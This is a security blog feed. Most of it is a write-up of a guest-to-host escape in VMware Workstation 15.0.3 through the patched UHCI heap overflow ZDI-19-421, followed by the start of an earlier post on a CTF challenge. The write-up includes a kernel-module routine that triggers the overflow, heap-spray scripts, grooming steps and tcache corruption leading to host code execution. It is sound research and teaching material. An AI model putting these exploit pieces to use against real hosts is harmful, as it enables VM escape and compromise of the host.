Jekyll2020-02-29T07:16:51+00:00https://nafod.net/blog/feed.xmlnafodpwn/re, ctf, etcPwning VMware, Part 2: ZDI-19-421, a UHCI bug2020-02-29T01:22:20+00:002020-02-29T01:22:20+00:00https://nafod.net/blog/2020/02/29/zdi-19-421-uhci<p>Though we’re now almost to March, I’m still spending my free time working though VMware pwning as part of my <a href="https://adventar.org/calendars/4440">2019 advent calendar</a>. I’d given myself 3 VMware challenges to look at, including one CTF challenge from Real World CTF Finals in 2018, and two n-days that were originally used at reported at Pwn2Own by Fluoroacetate. My previous post covered the RWCTF challenge, so now it’s time to play around with some thing more… real world :)</p>
<p>In this post I’ll look at ZDI-19-421, which was utilized for a VM breakout as part of a larger chain by the Fluoroacetate duo at Pwn2Own Vancouver 2019. To do this I’m working solely off the <a href="https://www.vmware.com/security/advisories/VMSA-2019-0005.html">VMware security advisory</a> and avoiding any other writeups or blog posts to develop my own understanding. This post will discuss some understanding about VMware I gained while working on my exploit, some UHCI internals, and a walkthrough of the techniques that ultimately worked for me. I’m still a USB and VMware noob, but hopefully this post can help shed some light on the workings of a USB exploit.</p>
<p>As a quick note, I used <code class="highlighter-rouge">Ubuntu 18.04</code> for both the host and guest. It doesn’t make a significant difference in the guest, but individual heap exploit details differ pretty significantly based on your choice of host. Luckily for us though, the bug in question is powerful enough that I’d consider it exploitable in the face of almost any allocator.</p>
<h2 id="the-environment">The environment</h2>
<p>Based on the security advisory (above), I determined that Workstation 15.0.4 was the first version with the patch, so I grabbed the free trials for both 15.0.4 and 15.0.3 to bindiff. The exploit itself was developed on 15.0.3, the latest version containing the bug. These installer bundles are still freely available on VMware’s website to play with yourself.</p>
<p>For most of the development I attached gdb to the <code class="highlighter-rouge">vmware-vmx</code> process in order to analyze the heap layout and churn. Most of the actual development was done directly on the guest VM over ssh, and involved frequent restarts of the guest. My final exploit involved a combination of kernel and userspace code in order to avoid reinventing the wheel on some VMware protocols.</p>
<p>According to the advisory and my own experience, the UHCI controller is automatically added in Workstation if you add USB 2.0 or 3.0 to your VM. Therefore, my guest VM was set up with mostly default options for <code class="highlighter-rouge">Ubuntu 18.04</code>, but I assigned it slightly more RAM (16gb) just to make it run a little faster. This isn’t required for my exploit, but merely made my life a little easier.</p>
<h2 id="vsockets-and-the-virtual-machine-communication-interface-vmci">vSockets and the Virtual Machine Communication Interface (VMCI)</h2>
<p>While VMware’s “Backdoor” interface is pretty well described online, an interesting new development is VMware’s move to the “vsocket” interface for guest<->host communications. I couldn’t find significant documentation about how the vsocket surface is implemented online, but VMware contributed a linux kernel module for guest support. vSockets are relevant to us because they have characteristics that are relevant to the heap groom, which I’ll describe in a later section.</p>
<p>To quickly summarize - the “Backdoor” API involves simple interactions with port-mapped IO to send commands:</p>
<pre><code class="language-x86">mov eax, 0x564D5868 // Magic value
mov ebx, <my-parameter>
mov ecx, <my-command>
mov edx, 0x5658 // IO port
in eax, dx
</code></pre>
<p>Backdoor requests are processed in a 7 stage part (open, send data/length, receive data/length, finalize, close). Each part involves a write to the IO port, which can be accessed either directly from userspace or from the kernel. Data can only be sent 4 bytes at a time and each part of the request involves a vmexit and stop-the-world of the guest CPU while the corresponding <code class="highlighter-rouge">vmx-vcpu-*</code> thread processes the request.</p>
<p>To address some of these problems, vSockets provide a new interface to access the same API surface (GuestRPC, Shared Folders, Drag-n-Drop, etc). vSockets work by creating an initial connection through port-mapped IO to register guest memory pages for subsequent use as memory-mapped queues. These queues will be used for a socket-style API, which provide for asynchronous communications between the host and guest. The guest system communicates by either writing datagrams to the IO ports in a single <code class="highlighter-rouge">REP INSB</code> instruction, or by writing out packets to the memory-mapped pages for transport-style, stateful connections.</p>
<p>vSockets are used to implement the Virtual Machine Communication Interface, a guest-to-host communications mechanism. To communicate, each endpoint gets assigned a CID, which is conceptually similar to an IP address, and then the endpoints can transmit to each other via a simple packet protocol. In a past life, VMCI was intended to allow guests to communicate between each other on the same host system. This allowed for guest<->guest communication without networking configured, even beween nested guests. Nowadays, this seems partially deprecated but may still be accessible for compatibility. For more implementation details, check out the <a href="https://code.woboq.org/linux/linux/drivers/misc/vmw_vmci/">driver implementation</a> in the mainline kernel.</p>
<h2 id="understanding-uhci">Understanding UHCI</h2>
<p>In order to exploit the bug we have to understand how to trigger the code, and in order to trigger the code we’ll need at least a rudimentary understanding of how UHCI works. The <a href="ftp://ftp.netbsd.org/pub/NetBSD/misc/blymn/uhci11d.pdf">UHCI spec (PDF)</a> is actually pretty readable at just under 50 pages, most of which is tables to refer to. I won’t try to cover it all here, but it’s worth touching on some general concepts. Also, I’m by no means a USB expert - everything here is based on my own understanding as used in my exploit.</p>
<p>UHCI is Intel’s spec for USB 1.1 and was originally documented in the late 90s. It’s primarily a software-driven standard, meaning that the hardware is relatively dumb and relies on the software to setup data structures and drive their manipulation. UHCI devices consist of several parts, but the two we care about are the Host Controller (HC) and Host Controller Driver (HCD). The HCD represents the software side in the kernel, and the HC is the entrypoint to the hardware, or in our case the host VMX.</p>
<p>Broadly, there are 4 types of USB transfers according to the UHCI spec:</p>
<ul>
<li><strong>Isochronous</strong> transfers are useful for data that needs relatively constant transfer, and is also time sensitive. The most obvious example would be audio or video streams.</li>
<li><strong>Interrupt</strong> transfers are for small transfers that occur infrequently, like input devices, but which are time sensitive</li>
<li><strong>Control</strong> is used for higher-level protocol traffic, like configuration or status</li>
<li><strong>Bulk</strong> is used for large data streams where we’re less latency sensitive, like transferring files to a flash drive.</li>
</ul>
<p>These distinctions are not actually enforced in UHCI; there’s no reason why you’d be forced to queue packets in a way that respects the latency/ordering or retransmission recommendations. However, it’s still a useful framing for understanding things.</p>
<p>At a broad level, UHCI operates off a large array structure called the <em>Frame List</em>, which is a 1024-long list of pointers. Each pointer references either a <em>Transfer Descriptor</em> (TD) or a <em>Queue Head</em> (QH).</p>
<p><img src="https://i.imgur.com/8EeSsoZ.png" alt="Transfer Descriptor" /></p>
<p><strong>Transfer Descriptors</strong> can best be understood as UDP packets. Each TD contains a Packet ID field to specify whether it is being sent or received, addressing information to tell the HC which device it should be sent to, and a Buffer Pointer to either data to be sent or to be written to.</p>
<p>TDs contain two length fields - a <em>MaxLen</em> representing the size of the TD buffer, and an <em>ActLen</em> which the hardware will update to reflect how many bytes were actually sent. An ‘active’ bit is used to determine whether a TD should be copied or skipped; the bit is cleared after data has been read or written. Each TD also contains a <em>Link Pointer</em> (LP) which specifies the next TD or QH.</p>
<p><img src="https://i.imgur.com/5R7ioNP.png" alt="Queue Head" /></p>
<p><strong>Queue Heads</strong> don’t directly point to data but rather act as junction nodes, used primarily for the software to organize itself. Each one contains two Link Pointers. When processing a QH, the HC will first follow the element LP, and then take the head LP branch afterwards. QHs can, in turn, point to other QHs as well, allowing for pretty complex schedules to be followed. QHs could be used to organizer traffic to prioritize certain USB endpoints or USB transfer types, or simply allow the software to quickly add/remove large parts of the list.</p>
<p><img src="https://i.imgur.com/GCHCDuO.png" alt="Example UHCI schedule" /></p>
<p>When enabled, the HCD will iterate through the list and pull the next pointer every 1 ms. It follows the list of TD/QHs and processes them one at a time, marking each one complete. When the 1ms window is out of time, it will simply stop processing TDs and jump to the next Frame List pointer.</p>
<p>Technically, the software is responsible for queueing things so they fit into the time window. Linux’s <code class="highlighter-rouge">usb_uhci</code> handles this by pointing each frame entry list to the same dummy entry, then queueing TDs onto it as necessary. The one exception is isochronous TDs, which can be queued directly onto their expected 1ms window.</p>
<h2 id="bindiff-and-chill">Bindiff and Chill</h2>
<p>Using Bindiff between 15.0.3 and 15.0.4, I noticed only a few functions that match with high confidence and have control flow graph related changes.</p>
<p><img src="https://i.imgur.com/LTr50zf.png" alt="vmx bindiff" /></p>
<p>5 functions are marked with <code class="highlighter-rouge">G</code> in their “Change” columns, two of which match with >= 90% similarity. One of them looks as follows:</p>
<p><img src="https://i.imgur.com/vRblhxf.png" alt="uhci_parse_td_list bindiff" /></p>
<p>It looks like a new check has been added against the contents of some data, with a fast bailout as seen in the basic block on the right. In the decompiler, we can get some more information on what’s happening:</p>
<pre><code class="language-clike=">// Grab the TD off the queued list
v58 = *((unsigned int *)v55 - 32);
v64 = *(_QWORD *)(*(_QWORD *)(*(v55 - 5) + 16LL * v57) + 8LL);
v70 = *(_WORD *)(v64 + 10) >> 5;
v71 = (v70 + 1) & 0x7FF;
v61 = (v70 + 1) & 0x7FF;
if ( (unsigned int)v71 > (unsigned int)v58 )
{
sub_55A410("UHCI: bulk TD size %d exceeds max packet size %d\n", v71, v58, v63, v117);
if ( !v65 )
goto LABEL_178;
LABEL_210:
sub_60CC50(v65);
goto LABEL_178;
}
</code></pre>
<p>Based on this error message, it seems like the check ensures that the current TD’s size doesn’t run over the total calculated size for the bulk TD stream.</p>
<p>The buggy code in 15.0.3 finally sheds some light on the nature of the bug. Below is some pseudocode annotated based on my own reversing:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">urb_size</span> <span class="o">=</span> <span class="n">usbdev</span><span class="o">-></span><span class="n">maxpkt</span> <span class="o">*</span> <span class="n">num_tds</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="n">urb_size</span> <span class="o">></span> <span class="n">max_urb_size</span><span class="p">)</span>
<span class="n">urb_size</span> <span class="o">=</span> <span class="n">max_urb_size</span>
<span class="n">urb</span> <span class="o">=</span> <span class="n">Vusb_NewUrb</span><span class="p">(</span><span class="n">uhcidev</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">urb_size</span><span class="p">);</span>
<span class="n">td</span> <span class="o">=</span> <span class="n">usbdev</span><span class="o">-></span><span class="n">tds</span><span class="p">;</span>
<span class="k">while</span><span class="p">(</span><span class="n">td</span><span class="p">)</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">uhci_copyin</span><span class="p">(</span><span class="n">uhci</span><span class="p">,</span><span class="s">"TDBuf"</span><span class="p">,</span><span class="n">td</span><span class="o">-></span><span class="n">addr</span><span class="p">,</span> <span class="n">urb</span><span class="o">-></span><span class="n">buf</span><span class="p">,</span> <span class="n">td</span><span class="p">))</span> <span class="p">{</span>
<span class="n">Vusb_FreeUrb</span><span class="p">(</span><span class="n">urb</span><span class="p">);</span>
<span class="k">goto</span> <span class="n">ERROR_ADDR</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">td</span> <span class="o">=</span> <span class="n">td</span><span class="o">-></span><span class="n">next</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>
<p>The UHCI virtual device calculates the total size of the TD buffer to copy in as <code class="highlighter-rouge">max_device_packet_length * num_tds</code>, but it never validates that the total size of the stream is less than that size. Per the UHCI spec, each TD can contain up to 0x3ff bytes, but most VMware devices expect TD packet sizes like 0x20 or 0x30 bytes.</p>
<p>For example, UHCI allows for up to 0x80 TDs in a single bulk transfer, and VMware’s Virtual Bluetooth device has a max TD size of 0x30. This means the host will allocate a heap buffer of size 0x1800 but if we set each TD to contain 0x100 bytes we can write up to 0x8000 fully controlled bytes to the host heap, a significant overflow.</p>
<h2 id="triggering-the-bug">Triggering the bug</h2>
<p>To trigger the bug we’ll have to write a kernel module to send a UHCI bulk stream. Thanks to helper functions we can access from the existing UHCI driver, this is pretty simple. The relevant code is as follows, mostly adopted from existing code adopted from that same driver:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">__hc32</span> <span class="nf">uhci_setup_leak</span><span class="p">(</span><span class="k">struct</span> <span class="n">uhci_hcd</span> <span class="o">*</span> <span class="n">uhci</span><span class="p">,</span> <span class="k">struct</span> <span class="n">uhci_qh</span> <span class="o">*</span> <span class="n">qh</span><span class="p">)</span> <span class="p">{</span>
<span class="k">struct</span> <span class="n">uhci_td</span> <span class="o">*</span> <span class="n">td</span><span class="p">;</span>
<span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">status</span><span class="p">;</span>
<span class="n">__hc32</span> <span class="o">*</span> <span class="n">plink</span><span class="p">;</span>
<span class="n">__hc32</span> <span class="n">retval</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">toggle</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="kt">int</span> <span class="n">x</span> <span class="o">=</span> <span class="mi">0</span><span class="p">,</span> <span class="n">added_tds</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="c1">// Allocate from our dma pool, which returns buffers of size 0x8000</span>
<span class="n">dma_addr_t</span> <span class="n">dma_handle</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="n">u8</span> <span class="o">*</span> <span class="n">dma_vaddr</span> <span class="o">=</span> <span class="n">dma_pool_alloc</span><span class="p">(</span><span class="n">mypool</span><span class="p">,</span> <span class="n">GFP_KERNEL</span><span class="p">,</span> <span class="o">&</span><span class="n">dma_handle</span><span class="p">);</span>
<span class="n">memset</span><span class="p">(</span><span class="n">dma_vaddr</span><span class="p">,</span> <span class="mh">0x41</span><span class="p">,</span> <span class="mh">0x8000</span><span class="p">);</span>
<span class="cm">/* 3 errors, dummy TD remains inactive */</span>
<span class="cp">#define uhci_maxerr(err)((err) << TD_CTRL_C_ERR_SHIFT)
</span> <span class="n">status</span> <span class="o">=</span> <span class="n">uhci_maxerr</span><span class="p">(</span><span class="mi">3</span><span class="p">)</span> <span class="o">|</span> <span class="n">TD_CTRL_ACTIVE</span><span class="p">;</span>
<span class="n">plink</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
<span class="n">td</span> <span class="o">=</span> <span class="n">qh</span><span class="o">-></span><span class="n">dummy_td</span><span class="p">;</span>
<span class="c1">// Send 0x80 TDs</span>
<span class="k">for</span> <span class="p">(</span><span class="n">x</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">x</span> <span class="o"><</span> <span class="mh">0x80</span><span class="p">;</span> <span class="n">x</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">plink</span><span class="p">)</span> <span class="p">{</span>
<span class="n">td</span> <span class="o">=</span> <span class="n">uhci_alloc_td</span><span class="p">(</span><span class="n">uhci</span><span class="p">);</span>
<span class="o">*</span> <span class="n">plink</span> <span class="o">=</span> <span class="n">LINK_TO_TD</span><span class="p">(</span><span class="n">uhci</span><span class="p">,</span> <span class="n">td</span><span class="p">);</span>
<span class="p">}</span>
<span class="c1">// Each TD contains 0x100 bytes</span>
<span class="n">uhci_fill_td</span><span class="p">(</span><span class="n">uhci</span><span class="p">,</span> <span class="n">td</span><span class="p">,</span> <span class="n">status</span><span class="p">,</span>
<span class="n">uhci_myendpoint</span><span class="p">(</span><span class="mh">0x2</span><span class="p">)</span> <span class="o">|</span> <span class="n">USB_PID_OUT</span> <span class="o">|</span>
<span class="c1">// this endpoint corresponds to the VMware Virtual Bluetooth device</span>
<span class="n">DEVICEADDR</span> <span class="o">|</span> <span class="n">uhci_explen</span><span class="p">(</span><span class="mh">0x100</span><span class="p">)</span> <span class="o">|</span>
<span class="p">(</span><span class="n">toggle</span> <span class="o"><<</span> <span class="n">TD_TOKEN_TOGGLE_SHIFT</span><span class="p">),</span>
<span class="n">dma_handle</span><span class="p">);</span>
<span class="n">plink</span> <span class="o">=</span> <span class="o">&</span> <span class="n">td</span><span class="o">-></span><span class="n">link</span><span class="p">;</span>
<span class="n">status</span> <span class="o">|=</span> <span class="n">TD_CTRL_ACTIVE</span><span class="p">;</span>
<span class="n">dma_handle</span> <span class="o">+=</span> <span class="mh">0x100</span><span class="p">;</span>
<span class="n">dma_vaddr</span> <span class="o">+=</span> <span class="mh">0x100</span><span class="p">;</span>
<span class="n">added_tds</span><span class="o">++</span><span class="p">;</span>
<span class="p">}</span>
<span class="c1">// Restore the dummy TD as the last in the chain</span>
<span class="n">td</span> <span class="o">=</span> <span class="n">uhci_alloc_td</span><span class="p">(</span><span class="n">uhci</span><span class="p">);</span>
<span class="o">*</span><span class="n">plink</span> <span class="o">=</span> <span class="n">LINK_TO_TD</span><span class="p">(</span><span class="n">uhci</span><span class="p">,</span> <span class="n">td</span><span class="p">);</span>
<span class="c1">// The last packet has 0 length</span>
<span class="n">uhci_fill_td</span><span class="p">(</span><span class="n">uhci</span><span class="p">,</span> <span class="n">td</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">USB_PID_OUT</span> <span class="o">|</span> <span class="n">uhci_explen</span><span class="p">(</span><span class="mi">0</span><span class="p">),</span> <span class="mi">0</span><span class="p">);</span>
<span class="n">wmb</span><span class="p">();</span>
<span class="n">qh</span><span class="o">-></span><span class="n">dummy_td</span><span class="o">-></span><span class="n">status</span> <span class="o">|=</span> <span class="n">cpu_to_hc32</span><span class="p">(</span><span class="n">uhci</span><span class="p">,</span> <span class="n">TD_CTRL_ACTIVE</span><span class="p">);</span>
<span class="c1">// Return the dma handle which we can write to the frame list</span>
<span class="n">retval</span> <span class="o">=</span> <span class="n">qh</span><span class="o">-></span><span class="n">dummy_td</span><span class="o">-></span><span class="n">dma_handle</span><span class="p">;</span>
<span class="n">qh</span><span class="o">-></span><span class="n">dummy_td</span> <span class="o">=</span> <span class="n">td</span><span class="p">;</span>
<span class="k">return</span> <span class="n">retval</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>
<p>Upon sending this payload, the UHCI Host Controller inside the VMX will allocate a buffer of size 0x18c0 and copy 0x8000 bytes from our guest memory into it. We successfully crash the host process with a heap error, and we can confirm in the debugger that we’re smashing significant amounts of heap data.</p>
<h2 id="heap-grooming-primitives">Heap Grooming primitives</h2>
<p>Unlike the previous challenge, which could be pwned solely on a glibc non-main arena, our USB bug can only be triggered on the main heap arena. This is unfortunate for us because the main arena has significant amounts of heap churn in a default VM:</p>
<ul>
<li>Each device associated with the VM will make allocations, sometimes only when used and sometimes just in the background</li>
<li>The VMX process stores data internally in a database called “VMDB”, which makes frequent allocations in the 0x20 -> 0x80 size range</li>
<li>VMautomation, which we don’t even seem to use in our test VM, also makes small allocations at periodic intervals</li>
<li>The “heartbeat” and “time sync” features also make allocations, although we can disable these</li>
</ul>
<p>Actually, it gets even worse because much of the code that interacts with the heap seems overeager to make unnecessary clones of buffers.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>vmtoolsd <span class="nt">--cmd</span> <span class="s1">'info-set guestinfo.mykey this-is-my-value'</span>
gef➤ search-pattern <span class="s2">"this-is-my-value"</span> little heap
<span class="o">[</span>+] Searching <span class="s1">'this-is-my-value'</span> <span class="k">in </span>heap
<span class="o">[</span>+] In <span class="s1">'[heap]'</span><span class="o">(</span>0x5593bdfda000-0x5593be6d7000<span class="o">)</span>, <span class="nv">permission</span><span class="o">=</span>rw-
0x5593be44a390 - 0x5593be44a3a0 → <span class="s2">"this-is-my-value"</span>
0x5593be49e680 - 0x5593be49e690 → <span class="s2">"this-is-my-value"</span>
0x5593be4b5380 - 0x5593be4b5390 → <span class="s2">"this-is-my-value"</span>
0x5593be6a51b0 - 0x5593be6a51c0 → <span class="s2">"this-is-my-value"</span>
</code></pre></div></div>
<p>During this simple <code class="highlighter-rouge">info-set</code> operation, I counted <strong>19 total allocations</strong> of buffers for our data. Most of them are immediately freed, usually the result of code patterns like <code class="highlighter-rouge">x = strdup(value); / do_something(x); / free(x)</code>, with the bulk of these occurring in the “VmdbVmCfg” data structure functions.</p>
<p>To work around this, I utilized the GuestRPC command <code class="highlighter-rouge">vmx.capability.unified_loop [value]</code>, which takes a single argument and traverses a global linked list looking to see if the user has previously stored that value. If not, it will save the value onto the list permanently. The command has no limits on how much data we can spray into the host heap, so we can use it with different value sizes as a straightforward way to level out the initial heap state.</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">for</span> <span class="n">x</span> <span class="ow">in</span> <span class="nb">xrange</span><span class="p">(</span><span class="mh">0x50</span><span class="p">):</span>
<span class="n">os</span><span class="o">.</span><span class="n">system</span><span class="p">(</span><span class="s">"vmtoolsd --cmd 'vmx.capability.unified_loop aaaaaaaaaaaa</span><span class="si">%04</span><span class="s">x</span><span class="si">%</span><span class="s">s' > /dev/null"</span> <span class="o">%</span> <span class="p">(</span><span class="n">x</span><span class="p">,</span> <span class="s">"B"</span><span class="o">*</span><span class="mh">0x3c0</span><span class="p">))</span>
<span class="k">for</span> <span class="n">x</span> <span class="ow">in</span> <span class="nb">xrange</span><span class="p">(</span><span class="mh">0x100</span><span class="p">):</span>
<span class="n">os</span><span class="o">.</span><span class="n">system</span><span class="p">(</span><span class="s">"vmtoolsd --cmd 'vmx.capability.unified_loop bbbbbbbbbbbb</span><span class="si">%04</span><span class="s">x</span><span class="si">%</span><span class="s">s' > /dev/null"</span> <span class="o">%</span> <span class="p">(</span><span class="n">x</span><span class="p">,</span> <span class="s">"B"</span><span class="o">*</span><span class="mh">0x100</span><span class="p">))</span>
</code></pre></div></div>
<p>One additional factor that helps us is utilizing our knowledge of glibc’s <a href="https://github.com/lunaczp/glibc-2.27/blob/951caf57765b28d91319dc44fd16e84182e1fde1/malloc/malloc.c#L1145">thread arena</a> architecture. In a multithreaded application, glibc may create different “arenas” for each thread, where each arena has its own associated freelist structures. Each thread arena has a separate heap mapping, although chunks can be freed to arenas corresponding to different heap regions. In our case, VMware has a separate thread arena for each <code class="highlighter-rouge">vmx-vcpu-*</code> thread and uses the main arena for the <code class="highlighter-rouge">vmware-vmx</code> thread.</p>
<p>To work around these arenas, we can utilize both the “Backdoor” and VMCI interfaces in the exploit. VMCI works in an asynchronous fashion, where incoming requests are serviced on the main <code class="highlighter-rouge">vmware-vmx</code> thread. This means that VMCI-related allocations are made on the heap’s main arena, as opposed to those related to Backdoor, which are made on the <code class="highlighter-rouge">vmware-vcpu-*</code> thread arenas. We can use this control to improve our sprays, by being precise about which method we use to send commands.</p>
<h2 id="obtaining-a-leak">Obtaining a leak</h2>
<p>To obtain a leak, we’ll abuse the different thread arenas to improve our chances of allocating chunks in the order we want. In order to leak data, I chose to target GuestRPC allocations that allocate data from the user and allow us to query it back. For this purpose, I played with the following commands:</p>
<ul>
<li><code class="highlighter-rouge">info-set guestinfo.[key] [value]</code> allows us to spray arbitrary ASCII key-value pairs into the host heap. These are not stored with associated length fields but instead are merely NULL terminated, so clobbering the strings lets us retrieve data beyond the “value” buffer. Furthermore, the corresponding <code class="highlighter-rouge">info-get</code> command retrieves a value and caches it temporarily, allowing us to <code class="highlighter-rouge">free()</code> the buffer later, at will</li>
<li><code class="highlighter-rouge">guest.upgrader_send_cmd_line_args [value]</code> allows us to store a single ASCII value, up to 0x400 bytes. We can then query the value at will. However, since it merely stores the raw pointer in the vmx binary BSS, this only causes minimal heap churn.</li>
</ul>
<p>To setup the leak, I performed several steps of grooming to improve the reliability:</p>
<ol>
<li>Stop userspace processes that trigger large allocations, like X11 (SVGA) and VMware tools processes</li>
<li>Disable all unrelated hardware devices (networking, CD-ROM, soundcards, etc)</li>
<li>Spray 0x200 chunks of size 0x50 with <code class="highlighter-rouge">info-set</code>, which we can later free, onto the vmx heap</li>
<li>Spray 0x60 chunks of size 0x800 with <code class="highlighter-rouge">unified_loop</code> to level out the initial vmx heap state</li>
<li>Spray 2 <code class="highlighter-rouge">info-set</code> buffers onto the <code class="highlighter-rouge">vmx-vcpu-0</code> heap of size 0x1c80 and 0x1890</li>
<li>Re-spray all the 0x50-sized values onto the <code class="highlighter-rouge">vmx-vcpu-0</code> heap, which has the side effect of freeing all the buffers on the main heap. These chunks will be used for miscellaneous bookkeeping allocations by the binary, preventing them from interfering with subsequent steps</li>
<li>Copy the first buffer via <code class="highlighter-rouge">info-get</code>, then copy the second; due to the nature of glibc unsorted-bin freelists, the second will land directly on top of the first, leaving a chunk of size 0x1c80-0x1890 = 0x3F0 on that freelist</li>
<li>Invoke <code class="highlighter-rouge">guest.upgrader_send_cmd_line_args</code> with a buffer to fill that 0x3F0 chunk we just created</li>
<li>Free the <code class="highlighter-rouge">info-get</code> buffer and trigger the USB bug. We’ll clobber the 0x3F0 ASCII string into the subsequent chunk. The subsequent chunk will most likely be a vtable pointer, allocated as part of the <code class="highlighter-rouge">unified_loop</code> spray above</li>
</ol>
<p><img src="https://i.imgur.com/YaqBFHm.gif" alt="Heap grooming for a leak" /></p>
<h2 id="corrupting-a-channel">Corrupting a channel</h2>
<p>Once we’ve obtained a leak, the path to obtaining PC control is relatively straightforward through the use of <a href="https://ctf-wiki.github.io/ctf-wiki/pwn/linux/glibc-heap/implementation/tcache/">tcache freelists</a> in glibc. This process is largely identical to what is presented above for the leak. However, this time we won’t allocate <code class="highlighter-rouge">guest.upgrader_send_cmd_line_args</code> at all, but rather just clobber the tcache pointer in the freed 0x3f0 space.</p>
<p>With arbitrary chunk creation, I chose to obtain PC as in my previous post. Since the steps are identical, you can find more information <a href="https://nafod.net/blog/2019/12/21/station-escape-vmware-pwn.html">there (see “Overwriting a channel..”)</a>.</p>
<h2 id="putting-it-all-together">Putting it all together</h2>
<p>Between the leak and the tcache corruption, we’re able to call <code class="highlighter-rouge">system("/usr/bin/xcalc")</code> in the host process with roughly 50% reliability. The bulk of the unreliability relates to the heap groom, and could be improved at least somewhat by performing the full exploit from the kernel module, rather than shelling out to VMware tooling. However, this saved me a good chunk of time that would be spent on re-implementing VMware interface, so laziness won out in the end.</p>
<div><video style="width: 100%; height: 100%;" preload="metadata" controls=""><source src="/blog/assets/video/zdi-19-421.mp4" type="video/mp4; codecs="avc1.42E01E, mp4a.40.2"" /></video></div>
<p>Here’s a video of the final exploit popping a shell on the host VM. As a quick note, this video is edited for heap spray time; the final version runs roughly 2x as long.</p>
<h2 id="parting-thoughts">Parting thoughts</h2>
<p>This was an interesting exploit that involved diving deep into USB standards and VMware virtual device implementations. It seems like these devices provide a rich attack surface to the guest, including significant numbers of devices exposed by default. From an attacker perspective, I’d definitely love to mentally diff hardware specifications against virtual implementations.</p>
<p>Unlike in my previous post, which looked only at the vcpu heap, taming heap instability appears to be a challenge in the main vmx heap. This will definitely be an area of interest for me moving forward, since my next challenge involves exploiting a bug in the virtual E1000 device. Reading through publicly available writeups and presentations, I found at least one primitive (SVGA buffers) which I did not investigate, but more personal research in this area would be beneficial.</p>
<p>VMware is a moving target with constant bugfixes and new features. There’s a lot of cool functionality to dig into and a rich history of online information about exploitation. I had a lot of fun writing this exploit and learning about USB. You can find my final solution script in my <a href="https://github.com/nafod/advent-vmpwn">advent-vmpwn</a> github repo, which I will release shortly after some cleanup. If you want even more, VMware is also a target in this year’s Pwn2Own Vancover, which will be held on March 18-20. Otherwise, see you soon in part 3 to read about E1000.</p>
<h2 id="useful-links">Useful Links</h2>
<p><a href="https://www.zerodayinitiative.com/blog/2019/5/7/taking-control-of-vmware-through-the-universal-host-controller-interface-part-1">ZDI’s writeup for the bug, based on Fluoroacetate’s exploit</a> (I didn’t consult this while pwning)</p>Though we’re now almost to March, I’m still spending my free time working though VMware pwning as part of my 2019 advent calendar. I’d given myself 3 VMware challenges to look at, including one CTF challenge from Real World CTF Finals in 2018, and two n-days that were originally used at reported at Pwn2Own by Fluoroacetate. My previous post covered the RWCTF challenge, so now it’s time to play around with some thing more… real world :)Pwning VMWare, Part 1: RWCTF 2018 Station-Escape2019-12-21T12:11:53+00:002019-12-21T12:11:53+00:00https://nafod.net/blog/2019/12/21/station-escape-vmware-pwn<p>Since December rolled around, I have been working on pwnables related to VMware breakouts as part of my advent calendar for 2019. Advent calendars are a fun way to get motivated to get familiar with a target you’re always putting off, and I had a lot of success learning about V8 with my calendar from <a href="https://nafod.net/blog/2019/02/13/advent-browserpwn-2018.html">last year</a>.</p>
<p>To that end, my calendar this year is lighter on challenges than last year. VMware has been part of significantly fewer CTFs than browsers, and the only recent and interesting challenge I noticed was <code class="highlighter-rouge">Station-Escape</code> from Real World CTF Finals 2018. To fill out the rest of the calendar, I picked up two additional bugs used at Pwn2Own this year by the talented Fluoroacetate duo. I plan to write an additional blog post about the exploitation of those challenges once complete, with a more broad look at VMware exploitation and attack surface. For now I’ll focus solely on the CTF pwnable and limit my scope to the sections relating to the challenge.</p>
<p>As a final note, I exploited VMware on <code class="highlighter-rouge">Ubuntu 18.04</code> which was the system used by the organizers during RWCTF. On other systems the exploitation could be wildly different and more complicated, due to the change in underlying heap implementation.</p>
<h2 id="the-environment-briefly">The environment (briefly)</h2>
<p>I debugged this challenge by using the VMware Workstation bundle inside of another VMware vm. After booting up the victim, I ssh’d into it and then attached to it with gdb in order to debug the <code class="highlighter-rouge">vmware-vmx</code> process. The actual guest OS doesn’t matter; in my case, I also used <code class="highlighter-rouge">Ubuntu 18.04</code> simply because I had just downloaded the iso.</p>
<h2 id="diffing-for-the-bug">Diffing for the bug</h2>
<p>The challenge itself is distributed with a vmware bundle file and a specific patched VMX binary. Once we install the bundle and compare the <code class="highlighter-rouge">vmware-vmx-patched</code> to the real <code class="highlighter-rouge">vmware-vmx</code> in bindiff, we find just a single code block patched, amounting to a few bytes as a bytepatch</p>
<p><a href="https://i.imgur.com/mufmCqN.png"><img src="https://i.imgur.com/mufmCqN.png" alt="bindiff graph comparison" /></a></p>
<p>And, in the decompiler, with some comments</p>
<pre><code class="language-clike">v26->state = 1;
v26->virt_time = VmTime_ReadVirtualTime();
sub_1D8D00(0, v5);
v6 = (void (__fastcall *)(__int64, _QWORD, _QWORD))v26->fp_close_backdoor;
v7 = vm_get_user_reg32(3);
v6(v26->field_48, v5, v7 & 0x21); // guestrpc_close_backdoor
LODWORD(v8) = 0x10000;
</code></pre>
<p>Luckily, the changes are very small, and amount to nopping out a struct field and changing the mask of a user controlled flag value.</p>
